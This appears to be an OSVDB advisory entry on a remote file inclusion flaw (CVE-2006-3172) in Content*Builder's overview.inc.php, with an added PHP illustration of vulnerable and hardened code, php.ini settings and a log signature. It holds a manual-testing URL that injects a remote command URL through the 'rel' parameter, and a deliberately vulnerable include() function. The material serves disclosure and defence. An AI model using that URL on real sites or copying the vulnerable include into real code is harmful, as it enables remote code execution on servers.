Content*Builder download/overview.inc.php rel Variable Remote File Inclusion

2006-06-11T16:34:06
ID OSVDB:26355
Type osvdb
Reporter Federico Fazzi (federico@autistici.org)
Modified 2006-06-11T16:34:06

Description

Vulnerability Description

Content*Builder contains a flaw that may allow a remote attacker to execute arbitrary commands. The issue is due to the /modules/download/overview.inc.php script not properly sanitizing user input supplied to the 'rel' variable. This may allow an attacker to include a file from a remote host that contains arbitrary commands which will be executed by the vulnerable script.
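The pattern the advisory describes, shown as an added PHP illustration (this is not Content*Builder's code, and the exact shape of the original include is not known from the record): a vulnerable form in which the `rel` request parameter is concatenated into an `include` path, beside a hardened form that treats the parameter only as a key into a fixed allowlist and refuses anything else. The function names, the template map and the file names are assumptions.

```php
<?php
// Added example, not Content*Builder's own code. Illustrates the flaw class
// from the advisory (request data flowing into include()) and one fix.
// Function names, the OVERVIEW_TEMPLATES map and file names are assumptions.

// Vulnerable form (assumed shape): the value of ?rel= becomes the start of the
// include path. When PHP is configured to allow URL wrappers in include
// (allow_url_include / allow_url_fopen), a value that is a URL makes the
// interpreter fetch and execute code from that host. This is the remote file
// inclusion the advisory describes; the function is shown only for contrast.
function overview_vulnerable(string $rel): void
{
    include $rel . 'overview_body.inc.php';
}

// Hardened form: the request parameter is only ever a key into a fixed map of
// files that live under this module's directory; any other value is rejected.
const OVERVIEW_TEMPLATES = [
    'list'    => 'overview_list.inc.php',
    'details' => 'overview_details.inc.php',
];

// Returns the absolute path of the allowed template, or '' when the request
// value is not on the allowlist or does not resolve inside this directory.
function overview_hardened(string $rel): string
{
    if (!array_key_exists($rel, OVERVIEW_TEMPLATES)) {
        http_response_code(400);
        return '';
    }
    $base = realpath(__DIR__);
    $real = realpath($base . '/' . OVERVIEW_TEMPLATES[$rel]);
    // Belt and braces: the resolved path must still sit under the module
    // directory even though the map itself contains only bare file names.
    if ($real === false || strpos($real, $base . DIRECTORY_SEPARATOR) !== 0) {
        http_response_code(400);
        return '';
    }
    return $real;
}

// Entry point: default to the 'list' view, include only what the allowlist
// resolved. The raw request value never reaches include().
$rel  = isset($_GET['rel']) ? (string) $_GET['rel'] : 'list';
$file = overview_hardened($rel);
if ($file !== '') {
    include $file;
}
```

Independently of any application fix, the PHP-level controls for this flaw class are `allow_url_include = Off` (and, for older PHP without that directive, `allow_url_fopen = Off`) in php.ini, which stop `include` from fetching remote URLs at all. On the detection side, requests whose `rel` parameter contains a scheme such as `http://` or `ftp://` against this script are the signature to alert on in web server logs.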

Solution Description

Currently, there are no known upgrades, patches, or workarounds available to correct this issue.

Short Description

Content*Builder contains a flaw that may allow a remote attacker to execute arbitrary commands. The issue is due to the /modules/download/overview.inc.php script not properly sanitizing user input supplied to the 'rel' variable. This may allow an attacker to include a file from a remote host that contains arbitrary commands which will be executed by the vulnerable script.

Manual Testing Notes

http://[target]/[cb_path]/modules/download/overview.inc.php?rel=[cmd_url]/

References:

Vendor URL: http://www.content-builder.de/
Secunia Advisory ID: 20557
Related OSVDB IDs: 26344, 26345, 26346, 26347, 26348, 26349, 26350, 26351, 26352, 26353, 26354, 26356, 26357, 26358, 26359, 26360, 26361, 26362, 26363
Mail List Post: http://archives.neohapsis.com/archives/bugtraq/2006-06/0211.html
FrSIRT Advisory: ADV-2006-2300
CVE: CVE-2006-3172
Bugtraq ID: 18404